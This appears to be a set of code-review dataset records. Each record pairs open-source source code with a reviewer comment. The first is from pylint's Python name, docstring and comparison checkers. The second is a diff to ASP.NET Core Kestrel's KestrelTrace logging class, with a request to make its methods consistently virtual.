node.name.split('.')[-1], node) self._bad_names = {} def leave_module(self, node): # pylint: disable=unused-argument for all_groups in self._bad_names.values(): if len(all_groups) < 2: continue groups = collections.defaultdict(list) min_warnings = sys.maxsize for group in all_groups.values(): groups[len(group)].append(group) min_warnings = min(len(group), min_warnings) if len(groups[min_warnings]) > 1: by_line = sorted(groups[min_warnings], key=lambda group: min(warning[0].lineno for warning in group)) warnings = itertools.chain(*by_line[1:]) else: warnings = groups[min_warnings][0] for args in warnings: self._raise_name_warning(*args) @utils.check_messages('blacklisted-name', 'invalid-name', 'assign-to-new-keyword') def visit_classdef(self, node): self._check_assign_to_new_keyword_violation(node.name, node) self._check_name('class', node.name, node) for attr, anodes in node.instance_attrs.items(): if not any(node.instance_attr_ancestors(attr)): self._check_name('attr', attr, anodes[0]) @utils.check_messages('blacklisted-name', 'invalid-name', 'assign-to-new-keyword') def visit_functiondef(self, node): # Do not emit any warnings if the method is just an implementation # of a base class method. self._check_assign_to_new_keyword_violation(node.name, node) confidence = interfaces.HIGH if node.is_method(): if utils.overrides_a_method(node.parent.frame(), node.name): return confidence = (interfaces.INFERENCE if utils.has_known_bases(node.parent.frame()) else interfaces.INFERENCE_FAILURE) self._check_name(_determine_function_name_type(node, config=self.config), node.name, node, confidence) # Check argument names args = node.args.args if args is not None: self._recursive_check_names(args, node) visit_asyncfunctiondef = visit_functiondef @utils.check_messages('blacklisted-name', 'invalid-name') def visit_global(self, node): for name in node.names: self._check_name('const', name, node) @utils.check_messages('blacklisted-name', 'invalid-name', 'assign-to-new-keyword') def visit_assignname(self, node): """check module level assigned names""" self._check_assign_to_new_keyword_violation(node.name, node) frame = node.frame() ass_type = node.assign_type() if isinstance(ass_type, astroid.Comprehension): self._check_name('inlinevar', node.name, node) elif isinstance(frame, astroid.Module): if isinstance(ass_type, astroid.Assign) and not in_loop(ass_type): if isinstance(utils.safe_infer(ass_type.value), astroid.ClassDef): self._check_name('class', node.name, node) else: if not _redefines_import(node): # Don't emit if the name redefines an import # in an ImportError except handler. self._check_name('const', node.name, node) elif isinstance(ass_type, astroid.ExceptHandler): self._check_name('variable', node.name, node) elif isinstance(frame, astroid.FunctionDef): # global introduced variable aren't in the function locals if node.name in frame and node.name not in frame.argnames(): if not _redefines_import(node): self._check_name('variable', node.name, node) elif isinstance(frame, astroid.ClassDef): if not list(frame.local_attr_ancestors(node.name)): self._check_name('class_attribute', node.name, node) def _recursive_check_names(self, args, node): """check names in a possibly recursive list <arg>""" for arg in args: if isinstance(arg, astroid.AssignName): self._check_name('argument', arg.name, node) else: self._recursive_check_names(arg.elts, node) def _find_name_group(self, node_type): return self._name_group.get(node_type, node_type) def _raise_name_warning(self, node, node_type, name, confidence): type_label = HUMAN_READABLE_TYPES[node_type] hint = self._name_hints[node_type] if self.config.include_naming_hint: hint += " (%r pattern)" % self._name_regexps[node_type].pattern args = ( type_label.capitalize(), name, hint ) self.add_message('invalid-name', node=node, args=args, confidence=confidence) self.stats['badname_' + node_type] += 1 def _check_name(self, node_type, name, node, confidence=interfaces.HIGH): """check for a name using the type's regexp""" if utils.is_inside_except(node): clobbering, _ = utils.clobber_in_except(node) if clobbering: return if name in self.config.good_names: return if name in self.config.bad_names: self.stats['badname_' + node_type] += 1 self.add_message('blacklisted-name', node=node, args=name) return regexp = self._name_regexps[node_type] match = regexp.match(name) if _is_multi_naming_match(match, node_type, confidence): name_group = self._find_name_group(node_type) bad_name_group = self._bad_names.setdefault(name_group, {}) warnings = bad_name_group.setdefault(match.lastgroup, []) warnings.append((node, node_type, name, confidence)) if match is None: self._raise_name_warning(node, node_type, name, confidence) def _check_assign_to_new_keyword_violation(self, name, node): keyword_first_version = self._name_became_keyword_in_version( name, self.KEYWORD_ONSET ) if keyword_first_version is not None: self.add_message('assign-to-new-keyword', node=node, args=(name, keyword_first_version), confidence=interfaces.HIGH) @staticmethod def _name_became_keyword_in_version(name, rules): for version, keywords in rules.items(): if name in keywords and sys.version_info < version: return '.'.join(map(str, version)) return None class DocStringChecker(_BasicChecker): msgs = { 'C0111': ('Missing %s docstring', # W0131 'missing-docstring', 'Used when a module, function, class or method has no docstring.' 'Some special methods like __init__ doesn\'t necessary require a ' 'docstring.'), 'C0112': ('Empty %s docstring', # W0132 'empty-docstring', 'Used when a module, function, class or method has an empty ' 'docstring (it would be too easy ;).'), } options = (('no-docstring-rgx', {'default' : NO_REQUIRED_DOC_RGX, 'type' : 'regexp', 'metavar' : '<regexp>', 'help' : 'Regular expression which should only match ' 'function or class names that do not require a ' 'docstring.'} ), ('docstring-min-length', {'default' : -1, 'type' : 'int', 'metavar' : '<int>', 'help': ('Minimum line length for functions/classes that' ' require docstrings, shorter ones are exempt.')} ), ) def open(self): self.stats = self.linter.add_stats(undocumented_module=0, undocumented_function=0, undocumented_method=0, undocumented_class=0) @utils.check_messages('missing-docstring', 'empty-docstring') def visit_module(self, node): self._check_docstring('module', node) @utils.check_messages('missing-docstring', 'empty-docstring') def visit_classdef(self, node): if self.config.no_docstring_rgx.match(node.name) is None: self._check_docstring('class', node) @staticmethod def _is_setter_or_deleter(node): names = {'setter', 'deleter'} for decorator in node.decorators.nodes: if (isinstance(decorator, astroid.Attribute) and decorator.attrname in names): return True return False @utils.check_messages('missing-docstring', 'empty-docstring') def visit_functiondef(self, node): if self.config.no_docstring_rgx.match(node.name) is None: ftype = 'method' if node.is_method() else 'function' if node.decorators and self._is_setter_or_deleter(node): return if isinstance(node.parent.frame(), astroid.ClassDef): overridden = False confidence = (interfaces.INFERENCE if utils.has_known_bases(node.parent.frame()) else interfaces.INFERENCE_FAILURE) # check if node is from a method overridden by its ancestor for ancestor in node.parent.frame().ancestors(): if node.name in ancestor and \ isinstance(ancestor[node.name], astroid.FunctionDef): overridden = True break self._check_docstring(ftype, node, report_missing=not overridden, confidence=confidence) elif isinstance(node.parent.frame(), astroid.Module): self._check_docstring(ftype, node) else: return visit_asyncfunctiondef = visit_functiondef def _check_docstring(self, node_type, node, report_missing=True, confidence=interfaces.HIGH): """check the node has a non empty docstring""" docstring = node.doc if docstring is None: if not report_missing: return lines = get_node_last_lineno(node) - node.lineno if node_type == 'module' and not lines: # If the module has no body, there's no reason # to require a docstring. return max_lines = self.config.docstring_min_length if node_type != 'module' and max_lines > -1 and lines < max_lines: return self.stats['undocumented_'+node_type] += 1 if (node.body and isinstance(node.body[0], astroid.Expr) and isinstance(node.body[0].value, astroid.Call)): # Most likely a string with a format call. Let's see. func = utils.safe_infer(node.body[0].value.func) if (isinstance(func, astroid.BoundMethod) and isinstance(func.bound, astroid.Instance)): # Strings in Python 3, others in Python 2. if PY3K and func.bound.name == 'str': return if func.bound.name in ('str', 'unicode', 'bytes'): return self.add_message('missing-docstring', node=node, args=(node_type,), confidence=confidence) elif not docstring.strip(): self.stats['undocumented_'+node_type] += 1 self.add_message('empty-docstring', node=node, args=(node_type,), confidence=confidence) class PassChecker(_BasicChecker): """check if the pass statement is really necessary""" msgs = {'W0107': ('Unnecessary pass statement', 'unnecessary-pass', 'Used when a "pass" statement that can be avoided is ' 'encountered.'), } @utils.check_messages('unnecessary-pass') def visit_pass(self, node): if len(node.parent.child_sequence(node)) > 1: self.add_message('unnecessary-pass', node=node) class LambdaForComprehensionChecker(_BasicChecker): """check for using a lambda where a comprehension would do. See <http://www.artima.com/weblogs/viewpost.jsp?thread=98196> where GvR says comprehensions would be clearer. """ msgs = {'W0110': ('map/filter on lambda could be replaced by comprehension', 'deprecated-lambda', 'Used when a lambda is the first argument to "map" or ' '"filter". It could be clearer as a list ' 'comprehension or generator expression.', {'maxversion': (3, 0)}), } @utils.check_messages('deprecated-lambda') def visit_call(self, node): """visit a Call node, check if map or filter are called with a lambda """ if not node.args: return if not isinstance(node.args[0], astroid.Lambda): return infered = utils.safe_infer(node.func) if (utils.is_builtin_object(infered) and infered.name in ['map', 'filter']): self.add_message('deprecated-lambda', node=node) def _is_one_arg_pos_call(call): """Is this a call with exactly 1 argument, where that argument is positional? """ return (isinstance(call, astroid.Call) and len(call.args) == 1 and not call.keywords) class ComparisonChecker(_BasicChecker): """Checks for comparisons - singleton comparison: 'expr == True', 'expr == False' and 'expr == None' - yoda condition: 'const "comp" right' where comp can be '==', '!=', '<', '<=', '>' or '>=', and right can be a variable, an attribute, a method or a function """ msgs = {'C0121': ('Comparison to %s should be %s', 'singleton-comparison', 'Used when an expression is compared to singleton ' 'values like True, False or None.'), 'C0122': ('Comparison should be %s', 'misplaced-comparison-constant', 'Used when the constant is placed on the left side ' 'of a comparison. It is usually clearer in intent to ' 'place it in the right hand side of the comparison.'), 'C0123': ('Using type() instead of isinstance() for a typecheck.', 'unidiomatic-typecheck', 'The idiomatic way to perform an explicit typecheck in ' 'Python is to use isinstance(x, Y) rather than ' 'type(x) == Y, type(x) is Y. Though there are unusual ' 'situations where these give different results.', {'old_names': [('W0154', 'unidiomatic-typecheck')]}), 'R0123': ('Comparison to literal', 'literal-comparison', 'Used when comparing an object to a literal, which is usually ' 'what you do not want to do, since you can compare to a different ' 'literal than what was expected altogether.'), } def _check_singleton_comparison(self, singleton, root_node, negative_check=False): if singleton.value is True: if not negative_check: suggestion = "just 'expr' or 'expr is True'" else: suggestion = "just 'not expr' or 'expr is False'" self.add_message('singleton-comparison', node=root_node, args=(True, suggestion)) elif singleton.value is False: if not negative_check: suggestion = "'not expr' or 'expr is False'" else: suggestion = "'expr' or 'expr is not False'" self.add_message('singleton-comparison', node=root_node, args=(False, suggestion)) elif singleton.value is None: if not negative_check: suggestion = "'expr is None'" else: suggestion = "'expr is not None'" self.add_message('singleton-comparison', node=root_node, args=(None, suggestion)) def _check_literal_comparison(self, literal, node): """Check if we compare to a literal, which is usually what we do not want to do.""" nodes = (astroid.List, astroid.Tuple, astroid.Dict, astroid.Set) is_other_literal = isinstance(literal, nodes) is_const = False if isinstance(literal, astroid.Const): if literal.value in (True, False, None): # Not interested in this values. return is_const = isinstance(literal.value, (bytes, str, int, float)) if is_const or is_other_literal: self.add_message('literal-comparison', node=node) def _check_misplaced_constant(self, node, left, right, operator): if isinstance(right, astroid.Const): return operator = REVERSED_COMPS.get(operator, operator) suggestion = '%s %s %r' % (right.as_string(), operator, left.value) self.add_message('misplaced-comparison-constant', node=node, args=(suggestion,)) @utils.check_messages('singleton-comparison', 'misplaced-comparison-constant', 'unidiomatic-typecheck', 'literal-comparison') def visit_compare(self, node): self._check_unidiomatic_typecheck(node) # NOTE: this checker only works with binary comparisons like 'x == 42' # but not 'x == y == 42' if len(node.ops) != 1: return left = node.left operator, right = node.ops[0] if (operator in ('<', '<=', '>', '>=', '!=', '==') and isinstance(left, astroid.Const)): self._check_misplaced_constant(node, left, right, operator) if operator == '==': if isinstance(left, astroid.Const): self._check_singleton_comparison(left, node) elif isinstance(right, astroid.Const): self._check_singleton_comparison(right, node) if operator == '!=': if isinstance(right, astroid.Const): self._check_singleton_comparison(right, node, negative_check=True) if operator in ('is', 'is not'): self._check_literal_comparison(right, node) def _check_unidiomatic_typecheck(self, node): operator, right = node.ops[0] if operator in TYPECHECK_COMPARISON_OPERATORS: left = node.left if _is_one_arg_pos_call(left): self._check_type_x_is_y(node, left, operator, right) def _check_type_x_is_y(self, node, left, operator, right): """Check for expressions like type(x) == Y.""" left_func = utils.safe_infer(left.func) if not (isinstance(left_func, astroid.ClassDef) and left_func.qname() == TYPE_QNAME): return if operator in ('is', 'is not') and _is_one_arg_pos_call(right): right_func = utils.safe_infer(right.func) if (isinstance(right_func, astroid.ClassDef) and right_func.qname() == TYPE_QNAME): # type(x) == type(a) right_arg = utils.safe_infer(right.args[0]) if not isinstance(right_arg, LITERAL_NODE_TYPES): # not e.g. type(x) == type([]) return self.add_message('unidiomatic-typecheck', node=node) def register(linter): """required method to auto register this checker""" linter.register_checker(BasicErrorChecker(linter)) linter.register_checker(BasicChecker(linter)) linter.register_checker(NameChecker(linter)) linter.register_checker(DocStringChecker(linter)) linter.register_checker(PassChecker(linter)) linter.register_checker(LambdaForComprehensionChecker(linter)) linter.register_checker(ComparisonChecker(linter))
1
10,149
Can we remove the argument from this message? A message will include a line number already that points to the place in the code that has the problem. I think we can remove it.
PyCQA-pylint
py
@@ -174,7 +174,7 @@ namespace Microsoft.AspNetCore.Server.Kestrel.Core.Internal _requestBodyMinimumDataRateNotSatisfied(_logger, connectionId, traceIdentifier, rate, null); } - public void ResponseMininumDataRateNotSatisfied(string connectionId, string traceIdentifier) + public virtual void ResponseMininumDataRateNotSatisfied(string connectionId, string traceIdentifier) { _responseMinimumDataRateNotSatisfied(_logger, connectionId, traceIdentifier, null); }
1
// Copyright (c) .NET Foundation. All rights reserved. // Licensed under the Apache License, Version 2.0. See License.txt in the project root for license information. using System; using Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Http2; using Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Http2.HPack; using Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Infrastructure; using Microsoft.Extensions.Logging; namespace Microsoft.AspNetCore.Server.Kestrel.Core.Internal { public class KestrelTrace : IKestrelTrace { private static readonly Action<ILogger, string, Exception> _connectionStart = LoggerMessage.Define<string>(LogLevel.Debug, 1, @"Connection id ""{ConnectionId}"" started."); private static readonly Action<ILogger, string, Exception> _connectionStop = LoggerMessage.Define<string>(LogLevel.Debug, 2, @"Connection id ""{ConnectionId}"" stopped."); private static readonly Action<ILogger, string, Exception> _connectionPause = LoggerMessage.Define<string>(LogLevel.Debug, 4, @"Connection id ""{ConnectionId}"" paused."); private static readonly Action<ILogger, string, Exception> _connectionResume = LoggerMessage.Define<string>(LogLevel.Debug, 5, @"Connection id ""{ConnectionId}"" resumed."); private static readonly Action<ILogger, string, Exception> _connectionKeepAlive = LoggerMessage.Define<string>(LogLevel.Debug, 9, @"Connection id ""{ConnectionId}"" completed keep alive response."); private static readonly Action<ILogger, string, Exception> _connectionDisconnect = LoggerMessage.Define<string>(LogLevel.Debug, 10, @"Connection id ""{ConnectionId}"" disconnecting."); private static readonly Action<ILogger, string, string, Exception> _applicationError = LoggerMessage.Define<string, string>(LogLevel.Error, 13, @"Connection id ""{ConnectionId}"", Request id ""{TraceIdentifier}"": An unhandled exception was thrown by the application."); private static readonly Action<ILogger, Exception> _notAllConnectionsClosedGracefully = LoggerMessage.Define(LogLevel.Debug, 16, "Some connections failed to close gracefully during server shutdown."); private static readonly Action<ILogger, string, string, Exception> _connectionBadRequest = LoggerMessage.Define<string, string>(LogLevel.Information, 17, @"Connection id ""{ConnectionId}"" bad request data: ""{message}"""); private static readonly Action<ILogger, string, long, Exception> _connectionHeadResponseBodyWrite = LoggerMessage.Define<string, long>(LogLevel.Debug, 18, @"Connection id ""{ConnectionId}"" write of ""{count}"" body bytes to non-body HEAD response."); private static readonly Action<ILogger, string, Exception> _requestProcessingError = LoggerMessage.Define<string>(LogLevel.Information, 20, @"Connection id ""{ConnectionId}"" request processing ended abnormally."); private static readonly Action<ILogger, Exception> _notAllConnectionsAborted = LoggerMessage.Define(LogLevel.Debug, 21, "Some connections failed to abort during server shutdown."); private static readonly Action<ILogger, TimeSpan, DateTimeOffset, Exception> _heartbeatSlow = LoggerMessage.Define<TimeSpan, DateTimeOffset>(LogLevel.Warning, 22, @"Heartbeat took longer than ""{interval}"" at ""{now}""."); private static readonly Action<ILogger, string, Exception> _applicationNeverCompleted = LoggerMessage.Define<string>(LogLevel.Critical, 23, @"Connection id ""{ConnectionId}"" application never completed"); private static readonly Action<ILogger, string, Exception> _connectionRejected = LoggerMessage.Define<string>(LogLevel.Warning, 24, @"Connection id ""{ConnectionId}"" rejected because the maximum number of concurrent connections has been reached."); private static readonly Action<ILogger, string, string, Exception> _requestBodyStart = LoggerMessage.Define<string, string>(LogLevel.Debug, 25, @"Connection id ""{ConnectionId}"", Request id ""{TraceIdentifier}"": started reading request body."); private static readonly Action<ILogger, string, string, Exception> _requestBodyDone = LoggerMessage.Define<string, string>(LogLevel.Debug, 26, @"Connection id ""{ConnectionId}"", Request id ""{TraceIdentifier}"": done reading request body."); private static readonly Action<ILogger, string, string, double, Exception> _requestBodyMinimumDataRateNotSatisfied = LoggerMessage.Define<string, string, double>(LogLevel.Information, 27, @"Connection id ""{ConnectionId}"", Request id ""{TraceIdentifier}"": the request timed out because it was not sent by the client at a minimum of {Rate} bytes/second."); private static readonly Action<ILogger, string, string, Exception> _responseMinimumDataRateNotSatisfied = LoggerMessage.Define<string, string>(LogLevel.Information, 28, @"Connection id ""{ConnectionId}"", Request id ""{TraceIdentifier}"": the connection was closed becuase the response was not read by the client at the specified minimum data rate."); private static readonly Action<ILogger, string, Exception> _http2ConnectionError = LoggerMessage.Define<string>(LogLevel.Information, 29, @"Connection id ""{ConnectionId}"": HTTP/2 connection error."); private static readonly Action<ILogger, string, Exception> _http2StreamError = LoggerMessage.Define<string>(LogLevel.Information, 30, @"Connection id ""{ConnectionId}"": HTTP/2 stream error."); private static readonly Action<ILogger, string, int, Exception> _hpackDecodingError = LoggerMessage.Define<string, int>(LogLevel.Information, 31, @"Connection id ""{ConnectionId}"": HPACK decoding error while decoding headers for stream ID {StreamId}."); protected readonly ILogger _logger; public KestrelTrace(ILogger logger) { _logger = logger; } public virtual void ConnectionStart(string connectionId) { _connectionStart(_logger, connectionId, null); } public virtual void ConnectionStop(string connectionId) { _connectionStop(_logger, connectionId, null); } public virtual void ConnectionPause(string connectionId) { _connectionPause(_logger, connectionId, null); } public virtual void ConnectionResume(string connectionId) { _connectionResume(_logger, connectionId, null); } public virtual void ConnectionKeepAlive(string connectionId) { _connectionKeepAlive(_logger, connectionId, null); } public void ConnectionRejected(string connectionId) { _connectionRejected(_logger, connectionId, null); } public virtual void ConnectionDisconnect(string connectionId) { _connectionDisconnect(_logger, connectionId, null); } public virtual void ApplicationError(string connectionId, string traceIdentifier, Exception ex) { _applicationError(_logger, connectionId, traceIdentifier, ex); } public virtual void ConnectionHeadResponseBodyWrite(string connectionId, long count) { _connectionHeadResponseBodyWrite(_logger, connectionId, count, null); } public void NotAllConnectionsClosedGracefully() { _notAllConnectionsClosedGracefully(_logger, null); } public void ConnectionBadRequest(string connectionId, BadHttpRequestException ex) { _connectionBadRequest(_logger, connectionId, ex.Message, ex); } public virtual void RequestProcessingError(string connectionId, Exception ex) { _requestProcessingError(_logger, connectionId, ex); } public void NotAllConnectionsAborted() { _notAllConnectionsAborted(_logger, null); } public virtual void HeartbeatSlow(TimeSpan interval, DateTimeOffset now) { _heartbeatSlow(_logger, interval, now, null); } public virtual void ApplicationNeverCompleted(string connectionId) { _applicationNeverCompleted(_logger, connectionId, null); } public virtual void RequestBodyStart(string connectionId, string traceIdentifier) { _requestBodyStart(_logger, connectionId, traceIdentifier, null); } public virtual void RequestBodyDone(string connectionId, string traceIdentifier) { _requestBodyDone(_logger, connectionId, traceIdentifier, null); } public void RequestBodyMininumDataRateNotSatisfied(string connectionId, string traceIdentifier, double rate) { _requestBodyMinimumDataRateNotSatisfied(_logger, connectionId, traceIdentifier, rate, null); } public void ResponseMininumDataRateNotSatisfied(string connectionId, string traceIdentifier) { _responseMinimumDataRateNotSatisfied(_logger, connectionId, traceIdentifier, null); } public void Http2ConnectionError(string connectionId, Http2ConnectionErrorException ex) { _http2ConnectionError(_logger, connectionId, ex); } public void Http2StreamError(string connectionId, Http2StreamErrorException ex) { _http2StreamError(_logger, connectionId, ex); } public void HPackDecodingError(string connectionId, int streamId, HPackDecodingException ex) { _hpackDecodingError(_logger, connectionId, streamId, ex); } public virtual void Log<TState>(LogLevel logLevel, EventId eventId, TState state, Exception exception, Func<TState, Exception, string> formatter) => _logger.Log(logLevel, eventId, state, exception, formatter); public virtual bool IsEnabled(LogLevel logLevel) => _logger.IsEnabled(logLevel); public virtual IDisposable BeginScope<TState>(TState state) => _logger.BeginScope(state); } }
1
14,318
This whole class is now a mix of virtual and non-virtual. I tried to see what would happen if I made everything non-virtual in dev, and the build still passes. It turns out that none of the other methods actually need to be virtual. Can you make *all* the logging methods either virtual or not for consistency? Thanks.
aspnet-KestrelHttpServer
.cs